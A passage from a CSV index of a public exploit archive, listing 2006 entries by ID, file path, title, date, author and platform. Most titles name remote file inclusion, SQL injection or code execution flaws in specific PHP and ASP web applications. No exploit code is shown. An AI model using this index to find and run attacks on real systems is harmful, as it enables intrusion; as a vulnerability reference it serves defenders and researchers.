Inclusion",2006-08-01,"Kurdish Security",php,webapps, -2102,exploits/php/webapps/2102.txt,"Voodoo chat 1.0RC1b - 'file_path' Remote File Inclusion",2006-08-01,SHiKaA,php,webapps, -2103,exploits/php/webapps/2103.txt,"k_shoutbox 4.4 - Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps, -2104,exploits/php/webapps/2104.txt,"k_fileManager 1.2 - 'dwl_include_path' Remote File Inclusion",2006-08-01,SHiKaA,php,webapps, -2105,exploits/php/webapps/2105.php,"XMB 1.9.6 - 'mq=off' 'u2uid' SQL Injection",2006-08-01,rgod,php,webapps, -2109,exploits/php/webapps/2109.txt,"WoW Roster 1.70 - '/lib/phpBB.php' Remote File Inclusion",2006-08-02,|peti,php,webapps, -2110,exploits/php/webapps/2110.pm,"TWiki 4.0.4 - Configure Script Remote Code Execution (Metasploit)",2006-08-02,"David Maciejak",php,webapps, -2113,exploits/php/webapps/2113.txt,"SaveWeb Portal 3.4 - 'SITE_Path' Remote File Inclusion",2006-08-02,"Mehmet Ince",php,webapps, -2114,exploits/php/webapps/2114.html,"TinyPHP Forum 3.6 - 'makeAdmin' Remote Admin Maker",2006-08-02,SirDarckCat,php,webapps, -2115,exploits/php/webapps/2115.txt,"Kayako eSupport 2.3.1 - 'subd' Remote File Inclusion",2006-08-02,beford,php,webapps, -2116,exploits/php/webapps/2116.txt,"TSEP 0.942 - 'colorswitch.php' Remote File Inclusion",2006-08-02,beford,php,webapps, -2117,exploits/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative Access",2006-08-03,rgod,php,webapps, -2118,exploits/php/webapps/2118.php,"MyBloggie 2.1.4 - 'trackback.php' Multiple SQL Injections",2006-08-07,rgod,php,webapps, -2119,exploits/php/webapps/2119.txt,"PHP Simple Shop 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,php,webapps, -2120,exploits/php/webapps/2120.txt,"PHP Live Helper 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,php,webapps, -2121,exploits/php/webapps/2121.txt,"Torbstoff News 4 - 'pfad' Remote File Inclusion",2006-08-07,SHiKaA,php,webapps, -2122,exploits/php/webapps/2122.txt,"ME Download System 1.3 - 'header.php' Remote File Inclusion",2006-08-07,"Philipp Niedziela",php,webapps, -2123,exploits/php/webapps/2123.txt,"SQLiteWebAdmin 0.1 - 'tpl.inc.php' Remote File Inclusion",2006-08-07,SirDarckCat,php,webapps, -2125,exploits/php/webapps/2125.txt,"Joomla! Component JD-Wiki 1.0.2 - Remote File Inclusion",2006-08-07,jank0,php,webapps, -2127,exploits/php/webapps/2127.txt,"ModernBill 1.6 - 'config.php' Remote File Inclusion",2006-08-07,Solpot,php,webapps, -2128,exploits/php/webapps/2128.txt,"SAPID 1.2.3.05 - 'ROOT_PATH' Remote File Inclusion",2006-08-07,Kacper,php,webapps, -2129,exploits/php/webapps/2129.txt,"SAPID Blog Beta 2 - 'ROOT_PATH' Remote File Inclusion",2006-08-07,Kacper,php,webapps,80 -2130,exploits/php/webapps/2130.txt,"SAPID Gallery 1.0 - 'ROOT_PATH' Remote File Inclusion",2006-08-07,Kacper,php,webapps,80 -2131,exploits/php/webapps/2131.txt,"SAPID Shop 1.2 - 'ROOT_PATH' Remote File Inclusion",2006-08-07,Kacper,php,webapps,80 -2132,exploits/php/webapps/2132.txt,"phpAutoMembersArea 3.2.5 - 'installed_config_file' Remote File Inclusion",2006-08-07,"Philipp Niedziela",php,webapps, -2133,exploits/php/webapps/2133.txt,"Simple CMS - Administrator Authentication Bypass",2006-08-07,daaan,php,webapps, -2134,exploits/php/webapps/2134.txt,"phpCC 4.2 Beta - 'base_dir' Remote File Inclusion",2006-08-07,Solpot,php,webapps, -2135,exploits/php/webapps/2135.txt,"NEWSolved Lite 1.9.2 - 'abs_path' Remote File Inclusion",2006-08-07,"Philipp Niedziela",php,webapps, -2137,exploits/php/webapps/2137.txt,"QuestCMS - 'main.php' Remote File Inclusion",2006-08-07,Crackers_Child,php,webapps, -2138,exploits/asp/webapps/2138.txt,"YenerTurk Haber Script 1.0 - SQL Injection",2006-08-07,ASIANEAGLE,asp,webapps, -2139,exploits/php/webapps/2139.txt,"PHPCodeCabinet 0.5 - 'Core.php' Remote File Inclusion",2006-08-07,Minion,php,webapps,80 -2141,exploits/php/webapps/2141.txt,"Visual Events Calendar 1.1 - 'cfg_dir' Remote File Inclusion",2006-08-07,"Mehmet Ince",php,webapps, -2142,exploits/php/webapps/2142.txt,"ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion",2006-08-07,"Mehmet Ince",php,webapps, -2143,exploits/php/webapps/2143.pl,"TWiki 4.0.4 - 'configure' Remote Command Execution",2006-08-07,"Javier Olascoaga",php,webapps, -2146,exploits/php/webapps/2146.txt,"docpile:we 0.2.2 - 'INIT_PATH' Remote File Inclusion",2006-08-08,"Mehmet Ince",php,webapps, -2148,exploits/php/webapps/2148.txt,"phNNTP 1.3 - 'article-raw.php' Remote File Inclusion",2006-08-08,Drago84,php,webapps,80 -2149,exploits/php/webapps/2149.txt,"Hitweb 4.2.1 - 'REP_INC' Remote File Inclusion",2006-08-08,Drago84,php,webapps, -2150,exploits/asp/webapps/2150.txt,"CLUB-Nuke [XP] 2.0 LCID 2048 (Turkish Version) - SQL Injection",2006-08-08,ASIANEAGLE,asp,webapps, -2151,exploits/php/webapps/2151.txt,"Cwfm 0.9.1 - 'Language' Remote File Inclusion",2006-08-08,"Philipp Niedziela",php,webapps,80 -2153,exploits/php/webapps/2153.txt,"Boite de News 4.0.1 - 'index.php' Remote File Inclusion",2006-08-09,"the master",php,webapps, -2154,exploits/php/webapps/2154.txt,"PgMarket 2.2.3 - 'CFG[libdir]' Remote File Inclusion",2006-08-09,"Mehmet Ince",php,webapps,80 -2155,exploits/php/webapps/2155.txt,"See-Commerce 1.0.625 - 'owimg.php3' Remote File Inclusion",2006-08-09,Drago84,php,webapps, -2157,exploits/php/webapps/2157.txt,"Tagger Luxury Edition - 'BBCodeFile' Remote File Inclusion",2006-08-09,Morgan,php,webapps, -2158,exploits/php/webapps/2158.txt,"TinyWebGallery 1.5 - 'image' Remote File Inclusion",2006-08-09,"Mehmet Ince",php,webapps, -2159,exploits/php/webapps/2159.pl,"PHPMyRing 4.2.0 - 'view_com.php' SQL Injection",2006-08-09,simo64,php,webapps,80 -2161,exploits/php/webapps/2161.pl,"SAPID CMS 1.2.3_rc3 - 'rootpath' Remote Code Execution",2006-08-10,simo64,php,webapps,80 -2163,exploits/php/webapps/2163.txt,"PHPWCMS 1.1-RC4 - 'spaw' Remote File Inclusion",2006-08-10,Morgan,php,webapps,80 -2165,exploits/php/webapps/2165.txt,"Spaminator 1.7 - 'page' Remote File Inclusion",2006-08-10,Drago84,php,webapps,80 -2166,exploits/php/webapps/2166.txt,"Thatware 0.4.6 - 'ROOT_PATH' Remote File Inclusion",2006-08-10,Drago84,php,webapps,80 -2167,exploits/php/webapps/2167.txt,"SaveWebPortal 3.4 - 'page' Remote File Inclusion",2006-08-10,Bl0od3r,php,webapps, -2168,exploits/php/webapps/2168.txt,"phpPrintAnalyzer 1.2 - Remote File Inclusion",2006-08-10,Cmaster4,php,webapps,80 -2169,exploits/php/webapps/2169.txt,"Chaussette 080706 - '_BASE' Remote File Inclusion",2006-08-10,Drago84,php,webapps, -2170,exploits/php/webapps/2170.txt,"VWar 1.50 R14 - 'online.php' SQL Injection",2006-08-10,brOmstar,php,webapps, -2171,exploits/php/webapps/2171.txt,"WEBInsta MM 1.3e - 'cabsolute_path' Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps, -2172,exploits/php/webapps/2172.txt,"Mambo Component Remository 3.25 - Remote File Inclusion",2006-08-10,camino,php,webapps, -2173,exploits/php/webapps/2173.txt,"MVCnPHP 3.0 - glConf[path_libraries] Remote File Inclusion",2006-08-10,Drago84,php,webapps, -2174,exploits/php/webapps/2174.txt,"Wheatblog 1.1 - 'session.php' Remote File Inclusion",2006-08-11,O.U.T.L.A.W,php,webapps,80 -2175,exploits/php/webapps/2175.txt,"WEBInsta CMS 0.3.1 - 'templates_dir' Remote File Inclusion",2006-08-12,K-159,php,webapps, -2177,exploits/php/webapps/2177.txt,"Joomla! Component Webring 1.0 - Remote File Inclusion",2006-08-13,"Mehmet Ince",php,webapps, -2178,exploits/php/webapps/2178.php,"XMB 1.9.6 Final - 'basename()' Remote Command Execution",2006-08-13,rgod,php,webapps, -2181,exploits/php/webapps/2181.pl,"PHPay 2.02 - 'nu_mail.inc.php?mail()' Remote Injection",2006-08-14,beford,php,webapps,80 -2182,exploits/php/webapps/2182.txt,"Mambo Component MMP 1.2 - Remote File Inclusion",2006-08-14,mdx,php,webapps, -2183,exploits/php/webapps/2183.txt,"ProjectButler 0.8.4 - 'rootdir' Remote File Inclusion",2006-08-14,"the master",php,webapps, -2184,exploits/php/webapps/2184.txt,"Mambo Component Peoplebook 1.0 - Remote File Inclusion",2006-08-14,Matdhule,php,webapps, -2186,exploits/asp/webapps/2186.txt,"Spidey Blog Script 1.5 - 'proje_goster.asp' SQL Injection (1)",2006-08-14,ASIANEAGLE,asp,webapps, -2187,exploits/php/webapps/2187.html,"WEBInsta MM 1.3e - 'absolute_path' Remote File Inclusion",2006-08-15,str0ke,php,webapps, -2188,exploits/php/webapps/2188.txt,"Discloser 0.0.4 - 'fileloc' Remote File Inclusion",2006-08-15,"Arash RJ",php,webapps, -2189,exploits/php/webapps/2189.txt,"WEBInsta CMS 0.3.1 - 'users.php' Remote File Inclusion",2006-08-15,Yns,php,webapps, -2190,exploits/php/webapps/2190.txt,"PHProjekt 5.1 - Multiple Remote File Inclusions",2006-08-15,Kacper,php,webapps, -2191,exploits/php/webapps/2191.txt,"dotProject 2.0.4 - 'baseDir' Remote File Inclusion",2006-08-16,Kacper,php,webapps, -2192,exploits/php/webapps/2192.txt,"OPT Max 1.2.0 - 'CRM_inc' Remote File Inclusion",2006-08-16,Kacper,php,webapps, -2196,exploits/php/webapps/2196.txt,"Mambo Component CopperminePhotoGalery - Remote File Inclusion",2006-08-16,k1tk4t,php,webapps, -2198,exploits/php/webapps/2198.php,"CubeCart 3.0.11 - 'oid' Blind SQL Injection",2006-08-17,rgod,php,webapps, -2199,exploits/php/webapps/2199.txt,"IRSR 0.2 - '_sysSessionPath' Remote File Inclusion",2006-08-17,Kacper,php,webapps, -2200,exploits/php/webapps/2200.txt,"WTcom 0.2.4-alpha - 'torrents.php' SQL Injection",2006-08-17,sh1r081,php,webapps, -2201,exploits/php/webapps/2201.txt,"POWERGAP 2003 - 's0x.php' Remote File Inclusion",2006-08-17,"Saudi Hackrz",php,webapps, -2202,exploits/php/webapps/2202.txt,"Mambo Component mambelfish 1.1 - Remote File Inclusion",2006-08-17,mdx,php,webapps, -2203,exploits/php/webapps/2203.txt,"Joomla! Component com_jim 1.0.1 - Remote File Inclusion",2006-08-17,"Mehmet Ince",php,webapps, -2205,exploits/php/webapps/2205.txt,"Joomla! Component Mosets Tree 1.0 - Remote File Inclusion",2006-08-17,Crackers_Child,php,webapps, -2206,exploits/php/webapps/2206.txt,"Mambo Component 'com_phpshop' 1.2 RC2b - Remote File Inclusion",2006-08-17,Cmaster4,php,webapps, -2207,exploits/php/webapps/2207.txt,"Mambo Component 'com_a6mambocredits' 1.0.0 - Remote File Inclusion",2006-08-17,Cmaster4,php,webapps, -2209,exploits/php/webapps/2209.txt,"Joomla! Component Artlinks 1.0b4 - Remote File Inclusion",2006-08-18,camino,php,webapps, -2211,exploits/php/webapps/2211.txt,"PHlyMail Lite 3.4.4 - 'mod.listmail.php' Remote File Inclusion",2006-08-18,Kacper,php,webapps, -2212,exploits/php/webapps/2212.txt,"phpCodeGenie 3.0.2 - 'BEAUT_PATH' Remote File Inclusion",2006-08-18,Kacper,php,webapps, -2213,exploits/php/webapps/2213.txt,"Mambo Component MamboWiki 0.9.6 - Remote File Inclusion",2006-08-18,camino,php,webapps, -2214,exploits/php/webapps/2214.txt,"Joomla! Component Link Directory 1.0.3 - Remote File Inclusion",2006-08-18,camino,php,webapps, -2215,exploits/php/webapps/2215.txt,"Joomla! Component Kochsuite 0.9.4 - Remote File Inclusion",2006-08-18,camino,php,webapps, -2216,exploits/php/webapps/2216.txt,"Sonium Enterprise Adressbook 0.2 - 'folder' Include",2006-08-18,"Philipp Niedziela",php,webapps, -2217,exploits/php/webapps/2217.txt,"Mambo Component cropimage 1.0 - Remote File Inclusion",2006-08-19,"Mehmet Ince",php,webapps, -2218,exploits/php/webapps/2218.txt,"Interact 2.2 - 'CONFIG[base_path]' Remote File Inclusion",2006-08-19,Kacper,php,webapps, -2219,exploits/php/webapps/2219.php,"Joomla! Component Poll 1.0.10 - Arbitrary Add Votes",2006-08-19,trueend5,php,webapps, -2220,exploits/php/webapps/2220.txt,"Tutti Nova 1.6 - 'TNLIB_DIR' Remote File Inclusion",2006-08-19,SHiKaA,php,webapps, -2221,exploits/php/webapps/2221.txt,"Fantastic News 2.1.3 - 'script_path' Remote File Inclusion",2006-08-19,SHiKaA,php,webapps, -2222,exploits/php/webapps/2222.txt,"Mambo Component com_lurm_constructor 0.6b - Remote File Inclusion",2006-08-19,mdx,php,webapps, -2224,exploits/php/webapps/2224.txt,"ZZ:FlashChat 3.1 - 'adminlog' Remote File Inclusion",2006-08-19,SHiKaA,php,webapps, -2225,exploits/php/webapps/2225.txt,"Mambo Component bigAPE-Backup 1.1 - Remote File Inclusion",2006-08-19,mdx,php,webapps, -2226,exploits/php/webapps/2226.txt,"NES Game and NES System c108122 - Remote File Inclusion",2006-08-20,Kacper,php,webapps, -2227,exploits/php/webapps/2227.txt,"SportsPHool 1.0 - 'mainnav' Remote File Inclusion",2006-08-20,Kacper,php,webapps, -2228,exploits/asp/webapps/2228.txt,"SimpleBlog 2.0 - 'comments.asp' SQL Injection (1)",2006-08-20,"Chironex Fleckeri",asp,webapps, -2229,exploits/php/webapps/2229.txt,"Shadows Rising RPG 0.0.5b - Remote File Inclusion",2006-08-20,Kacper,php,webapps, -2230,exploits/asp/webapps/2230.txt,"LBlog 1.05 - 'comments.asp' SQL Injection",2006-08-20,"Chironex Fleckeri",asp,webapps, -2231,exploits/php/webapps/2231.php,"Simple Machines Forum (SMF) 1.1 rc2 (Windows) - 'lngfile' Local File Inclusion",2006-08-20,rgod,php,webapps, -2232,exploits/php/webapps/2232.pl,"SimpleBlog 2.0 - 'comments.asp' SQL Injection (2)",2006-08-20,ASIANEAGLE,php,webapps, -2235,exploits/php/webapps/2235.txt,"PHProjekt 6.1 - 'path_pre' Multiple Remote File Inclusions",2006-08-21,"the master",php,webapps, -2236,exploits/php/webapps/2236.txt,"PHlyMail Lite 3.4.4 - 'folderprops.php' Remote File Inclusion (2)",2006-08-21,Kw3[R]Ln,php,webapps, -2239,exploits/php/webapps/2239.txt,"Empire CMS 3.7 - 'checklevel.php' Remote File Inclusion",2006-08-22,"Bob Linuson",php,webapps, -2240,exploits/php/webapps/2240.txt,"HPE 1.0 - HPEinc Remote File Inclusion (2)",2006-08-22,"the master",php,webapps, -2243,exploits/php/webapps/2243.php,"Simple Machines Forum (SMF) 1.1 rc2 - Lock Topics",2006-08-22,rgod,php,webapps, -2247,exploits/php/webapps/2247.php,"MercuryBoard 1.1.4 - 'User-Agent' SQL Injection",2006-08-23,rgod,php,webapps, -2248,exploits/php/webapps/2248.pl,"phpBB All Topics Mod 1.5.0 - 'start' SQL Injection",2006-08-23,SpiderZ,php,webapps, -2249,exploits/php/webapps/2249.txt,"pSlash 0.7 - 'lvc_include_dir' Remote File Inclusion",2006-08-23,"Mehmet Ince",php,webapps, -2250,exploits/php/webapps/2250.pl,"Integramod Portal 2.x - 'functions_portal.php' Remote File Inclusion",2006-08-23,nukedx,php,webapps, -2251,exploits/php/webapps/2251.pl,"VistaBB 2.x - 'functions_mod_user.php' Remote File Inclusion",2006-08-23,nukedx,php,webapps, -2252,exploits/php/webapps/2252.pl,"Wikepage Opus 10 < 2006.2a (lng) - Remote Command Execution",2006-08-24,Hessam-x,php,webapps, -2253,exploits/php/webapps/2253.php,"Phaos 0.9.2 - 'basename()' Remote Command Execution",2006-08-24,Kacper,php,webapps, -2254,exploits/php/webapps/2254.txt,"PHPCOIN 1.2.3 - 'session_set.php' Remote File Inclusion",2006-08-24,Timq,php,webapps, -2255,exploits/php/webapps/2255.txt,"eFiction < 2.0.7 - Remote Admin Authentication Bypass",2006-08-25,Vipsta,php,webapps, -2256,exploits/php/webapps/2256.txt,"Integramod Portal 2.0 rc2 - 'phpbb_root_path' Remote File Inclusion",2006-08-25,MATASANOS,php,webapps, -2257,exploits/php/webapps/2257.txt,"CliServ Web Community 0.65 - 'cl_headers' Include",2006-08-25,Kacper,php,webapps, -2259,exploits/php/webapps/2259.txt,"ProManager 0.73 - 'note.php' SQL Injection",2006-08-26,Kacper,php,webapps, -2260,exploits/php/webapps/2260.pl,"AlberT-EasySite 1.0a5 - 'PSA_PATH' Remote File Inclusion",2006-08-27,Kacper,php,webapps, -2261,exploits/php/webapps/2261.php,"iziContents RC6 - Remote Code Execution",2006-08-27,Kacper,php,webapps, -2262,exploits/php/webapps/2262.php,"CMS Frogss 0.4 - 'podpis' SQL Injection",2006-08-27,Kacper,php,webapps, -2263,exploits/php/webapps/2263.txt,"Ay System CMS 2.6 - 'main.php' Remote File Inclusion",2006-08-27,SHiKaA,php,webapps, -2266,exploits/cgi/webapps/2266.txt,"Cybozu Products - 'id' Arbitrary File Retrieval",2006-08-28,"Tan Chew Keong",cgi,webapps, -2267,exploits/cgi/webapps/2267.txt,"Cybuzu Garoon 2.1.0 - Multiple SQL Injections",2006-08-28,"Tan Chew Keong",cgi,webapps, -2268,exploits/php/webapps/2268.php,"e107 < 0.75 - GLOBALS Overwrite Remote Code Execution",2006-08-28,rgod,php,webapps, -2269,exploits/php/webapps/2269.txt,"Web3news 0.95 - 'PHPSECURITYADMIN_PATH' Remote File Inclusion",2006-08-28,SHiKaA,php,webapps, -2270,exploits/php/webapps/2270.php,"phpGroupWare 0.9.16.010 - GLOBALS[] Remote Code Execution",2006-08-29,Kacper,php,webapps, -2271,exploits/php/webapps/2271.txt,"PortailPHP mod_phpalbum 2.1.5 - 'chemin' Remote File Inclusion",2006-08-29,"Mehmet Ince",php,webapps, -2272,exploits/php/webapps/2272.txt,"MiniBill 1.22b - config[plugin_dir] Remote File Inclusion",2006-08-29,"the master",php,webapps, -2273,exploits/php/webapps/2273.txt,"ExBB Italiano 0.2 - exbb[home_path] Remote File Inclusion",2006-08-29,SHiKaA,php,webapps, -2275,exploits/php/webapps/2275.txt,"PHPECard 2.1.4 - 'functions.php' Remote File Inclusion",2006-08-29,LeAk,php,webapps, -2279,exploits/php/webapps/2279.txt,"phpAtm 1.21 - 'include_location' Remote File Inclusion",2006-08-30,KinSize,php,webapps, -2280,exploits/php/webapps/2280.pl,"Lanifex DMO 2.3b - '_incMgr' Remote File Inclusion",2006-08-30,Kacper,php,webapps, -2281,exploits/php/webapps/2281.pl,"Pheap CMS 1.1 - 'lpref' Remote File Inclusion",2006-08-31,Kacper,php,webapps, -2282,exploits/php/webapps/2282.txt,"YACS CMS 6.6.1 - context[path_to_root] Remote File Inclusion",2006-08-31,MATASANOS,php,webapps, -2285,exploits/php/webapps/2285.txt,"MyBace Light - 'login_check.php' Remote File",2006-09-01,"Philipp Niedziela",php,webapps, -2287,exploits/asp/webapps/2287.txt,"icblogger 2.0 - 'YID' SQL Injection",2006-09-01,"Chironex Fleckeri",asp,webapps, -2288,exploits/php/webapps/2288.php,"TikiWiki 1.9 Sirius - 'jhot.php' Remote Command Execution",2006-09-02,rgod,php,webapps, -2289,exploits/php/webapps/2289.pl,"Annuaire 1Two 2.2 - SQL Injection",2006-09-02,DarkFig,php,webapps, -2290,exploits/php/webapps/2290.txt,"Dyncms Release 6 - 'x_admindir' Remote File Inclusion",2006-09-02,SHiKaA,php,webapps, -2291,exploits/php/webapps/2291.php,"PmWiki 2.1.19 - 'Zend_Hash_Del_Key_Or_Index' Remote Command Execution",2006-09-03,rgod,php,webapps, -2292,exploits/php/webapps/2292.txt,"Yappa-ng 2.3.1 - 'admin_modules' Remote File Inclusion",2006-09-03,SHiKaA,php,webapps, -2293,exploits/php/webapps/2293.txt,"FlashChat 4.5.7 - 'aedating4CMS.php' Remote File Inclusion",2006-09-04,NeXtMaN,php,webapps, -2294,exploits/asp/webapps/2294.txt,"Muratsoft Haber Portal 3.6 - 'tr' SQL Injection",2006-09-03,ASIANEAGLE,asp,webapps, -2295,exploits/php/webapps/2295.txt,"In-link 2.3.4 - 'ADODB_DIR' Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps, -2296,exploits/asp/webapps/2296.txt,"SimpleBlog 2.3 - 'id' SQL Injection",2006-09-04,Vipsta/MurderSkillz,asp,webapps, -2297,exploits/php/webapps/2297.pl,"TR Forum 2.0 - SQL Injection / Bypass Security Restriction",2006-09-04,DarkFig,php,webapps, -2298,exploits/php/webapps/2298.php,"pHNews alpha 1 - 'templates_dir' Remote Code Execution",2006-09-04,Kacper,php,webapps, -2299,exploits/php/webapps/2299.php,"PHP Proxima 6 - completepack Remote Code Execution",2006-09-04,Kacper,php,webapps, -2300,exploits/php/webapps/2300.pl,"SoftBB 0.1 - 'cmd' Remote Command Execution",2006-09-04,DarkFig,php,webapps, -2301,exploits/php/webapps/2301.txt,"MySpeach 3.0.2 - 'my_ms[root]' Remote File Inclusion",2006-09-05,SHiKaA,php,webapps, -2304,exploits/php/webapps/2304.txt,"GrapAgenda 0.1 - 'page' Remote File Inclusion",2006-09-05,"Kurdish Security",php,webapps, -2305,exploits/php/webapps/2305.txt,"AnnonceV News Script 1.1 - 'page' Remote File Inclusion",2006-09-05,"Kurdish Security",php,webapps, -2306,exploits/asp/webapps/2306.txt,"Zix Forum 1.12 - 'RepId' SQL Injection (1)",2006-09-05,"Chironex Fleckeri",asp,webapps, -2307,exploits/php/webapps/2307.txt,"ACGV News 0.9.1 - 'article.php' Remote File Inclusion",2006-09-05,SHiKaA,php,webapps, -2308,exploits/php/webapps/2308.txt,"C-News 1.0.1 - 'path' Remote File Inclusion",2006-09-05,SHiKaA,php,webapps, -2309,exploits/php/webapps/2309.txt,"Sponge News 2.2 - 'sndir' Remote File Inclusion",2006-09-05,SHiKaA,php,webapps, -2310,exploits/php/webapps/2310.php,"PhpCommander 3.0 - 'upload' Remote Code Execution",2006-09-05,Kacper,php,webapps, -2311,exploits/php/webapps/2311.txt,"phpBB Shadow Premod 2.7.1 - Remote File Inclusion",2006-09-06,Kw3[R]Ln,php,webapps, -2312,exploits/php/webapps/2312.txt,"BinGo News 3.01 - 'bnrep' Remote File Inclusion",2006-09-06,SHiKaA,php,webapps, -2313,exploits/php/webapps/2313.txt,"phpFullAnnu 5.1 - 'repmod' Remote File Inclusion",2006-09-06,SHiKaA,php,webapps, -2314,exploits/php/webapps/2314.txt,"Beautifier 0.1 - 'Core.php' Remote File Inclusion",2006-09-06,"the master",php,webapps, -2315,exploits/php/webapps/2315.txt,"Akarru 0.4.3.34 - 'bm_content' Remote File Inclusion",2006-09-06,ddoshomo,php,webapps, -2316,exploits/php/webapps/2316.txt,"PayProCart 1146078425 - Multiple Remote File Inclusions",2006-09-07,momo26,php,webapps, -2317,exploits/php/webapps/2317.txt,"SL_Site 1.0 - 'spaw_root' Remote File Inclusion",2006-09-07,Kw3[R]Ln,php,webapps, -2318,exploits/php/webapps/2318.txt,"Web Server Creator 0.1 - 'l' Remote File Inclusion",2006-09-07,"Mehmet Ince",php,webapps, -2319,exploits/php/webapps/2319.txt,"Fire Soft Board RC 3 - 'racine' Remote File Inclusion",2006-09-07,ddoshomo,php,webapps, -2321,exploits/php/webapps/2321.php,"DokuWiki 2006-03-09b - 'dwpage.php' Remote Code Execution",2006-09-07,rgod,php,webapps, -2322,exploits/php/webapps/2322.php,"DokuWiki 2006-03-09b - 'dwpage.php' System Disclosure",2006-09-07,rgod,php,webapps, -2323,exploits/php/webapps/2323.txt,"PhpNews 1.0 - 'Include' Remote File Inclusion",2006-09-07,"the master",php,webapps, -2324,exploits/php/webapps/2324.txt,"ACGV News 0.9.1 - 'header.php' Remote File Inclusion",2006-09-07,ddoshomo,php,webapps, -2325,exploits/php/webapps/2325.txt,"News Evolution 3.0.3 - _NE[AbsPath] Remote File Inclusion",2006-09-07,ddoshomo,php,webapps, -2326,exploits/php/webapps/2326.txt,"WM-News 0.5 - Multiple Remote File Inclusions",2006-09-07,ddoshomo,php,webapps, -2327,exploits/php/webapps/2327.txt,"PhotoKorn Gallery 1.52 - 'dir_path' Remote File Inclusion",2006-09-07,"Saudi Hackrz",php,webapps, -2329,exploits/php/webapps/2329.txt,"Somery 0.4.6 - 'skin_dir' Remote File Inclusion",2006-09-08,basher13,php,webapps, -2333,exploits/php/webapps/2333.php,"CCleague Pro 1.0.1RC1 - 'cookie' Remote Code Execution",2006-09-08,Kacper,php,webapps, -2335,exploits/php/webapps/2335.txt,"MyABraCaDaWeb 1.0.3 - 'base' Remote File Inclusion",2006-09-08,ddoshomo,php,webapps, -2336,exploits/php/webapps/2336.pl,"Socketwiz BookMarks 2.0 - 'root_dir' Remote File Inclusion",2006-09-09,Kacper,php,webapps, -2337,exploits/php/webapps/2337.txt,"Vivvo Article Manager 3.2 - 'id' SQL Injection",2006-09-09,MercilessTurk,php,webapps, -2339,exploits/php/webapps/2339.txt,"Vivvo Article Manager 3.2 - 'classified_path' File Inclusion",2006-09-09,MercilessTurk,php,webapps, -2340,exploits/php/webapps/2340.txt,"PUMA 1.0 RC 2 - 'config.php' Remote File Inclusion",2006-09-10,"Philipp Niedziela",php,webapps, -2341,exploits/php/webapps/2341.txt,"Open Bulletin Board 1.0.8 - 'ROOT_PATH' File Inclusion",2006-09-10,Eddy_BAck0o,php,webapps, -2342,exploits/php/webapps/2342.txt,"mcGalleryPRO 2006 - 'path_to_folder' Remote File Inclusion",2006-09-10,Solpot,php,webapps, -2343,exploits/php/webapps/2343.txt,"MiniPort@l 0.1.5 Beta - 'skiny' Remote File Inclusion",2006-09-11,Kacper,php,webapps, -2344,exploits/php/webapps/2344.txt,"OPENi-CMS 1.0.1beta - 'config' Remote File Inclusion",2006-09-11,basher13,php,webapps, -2346,exploits/php/webapps/2346.txt,"WTools 0.0.1a - 'INCLUDE_PATH' Remote File Inclusion",2006-09-11,ddoshomo,php,webapps, -2347,exploits/php/webapps/2347.txt,"PhpLinkExchange 1.0 - Include / Cross-Site Scripting",2006-09-11,s3rv3r_hack3r,php,webapps, -2348,exploits/php/webapps/2348.pl,"phpBB 2.0.21 - Poison Null Byte Remote File Upload",2006-09-11,ShAnKaR,php,webapps, -2349,exploits/php/webapps/2349.txt,"phpBB XS 0.58 - 'functions.php' Remote File Inclusion",2006-09-12,AzzCoder,php,webapps, -2350,exploits/php/webapps/2350.txt,"p4CMS 1.05 - 'abs_pfad' Remote File Inclusion",2006-09-12,SHiKaA,php,webapps, -2351,exploits/php/webapps/2351.txt,"Popper 1.41-r2 - 'form' Remote File Inclusion",2006-09-12,SHiKaA,php,webapps, -2352,exploits/php/webapps/2352.txt,"webSPELL 4.01.01 - Database Backup Download",2006-09-12,Trex,php,webapps, -2353,exploits/php/webapps/2353.txt,"Vitrax Pre-modded 1.0.6-r3 - Remote File Inclusion",2006-09-12,CeNGiZ-HaN,php,webapps, -2354,exploits/php/webapps/2354.txt,"Telekorn Signkorn Guestbook 1.3 - 'dir_path' Remote File Inclusion",2006-09-12,SHiKaA,php,webapps, -2356,exploits/php/webapps/2356.txt,"Quicksilver Forums 1.2.1 - Remote File Inclusion",2006-09-13,mdx,php,webapps, -2357,exploits/php/webapps/2357.txt,"phpunity.postcard - 'gallery_path' Remote File Inclusion",2006-09-13,Rivertam,php,webapps, -2359,exploits/php/webapps/2359.txt,"Downstat 1.8 - 'art' Remote File Inclusion",2006-09-13,SilenZ,php,webapps, -2361,exploits/php/webapps/2361.txt,"Shadowed Portal 5.599 - 'root' Remote File Inclusion",2006-09-13,mad_hacker,php,webapps, -2362,exploits/asp/webapps/2362.txt,"TualBLOG 1.0 - 'icerikno' SQL Injection",2006-09-13,RMx,asp,webapps, -2363,exploits/php/webapps/2363.tt,"Magic News Pro 1.0.3 - 'script_path' Remote File Inclusion",2006-09-13,"Saudi Hackrz",php,webapps, -2364,exploits/php/webapps/2364.txt,"KnowledgeBuilder 2.2 - 'visEdit_root' Remote File Inclusion",2006-09-13,igi,php,webapps, -2365,exploits/php/webapps/2365.txt,"Newsscript 0.5 - Local/Remote File Inclusion",2006-09-13,"Daftrix Security",php,webapps, -2366,exploits/php/webapps/2366.txt,"phpQuiz 0.1 - 'pagename' Remote File Inclusion",2006-09-14,Solpot,php,webapps, -2367,exploits/php/webapps/2367.txt,"Mambo Component com_serverstat 0.4.4 - Remote File Inclusion",2006-09-14,"Mehmet Ince",php,webapps, -2368,exploits/php/webapps/2368.txt,"TeamCal Pro 2.8.001 - 'app_root' Remote File Inclusion",2006-09-14,PSYCH@,php,webapps, -2369,exploits/php/webapps/2369.txt,"PhotoPost 4.6 - 'PP_PATH' Remote File Inclusion",2006-09-15,"Saudi Hackrz",php,webapps, -2370,exploits/php/webapps/2370.php,"Limbo CMS 1.0.4.2L - 'com_contact' Remote Code Execution",2006-09-15,rgod,php,webapps, -2371,exploits/asp/webapps/2371.txt,"Haberx 1.02 < 1.1 - 'tr' SQL Injection",2006-09-15,"Fix TR",asp,webapps, -2372,exploits/php/webapps/2372.txt,"BolinOS 4.5.5 - 'gBRootPath' Remote File Inclusion",2006-09-15,"Mehmet Ince",php,webapps, -2373,exploits/php/webapps/2373.txt,"PHP DocWriter 0.3 - 'script' Remote File 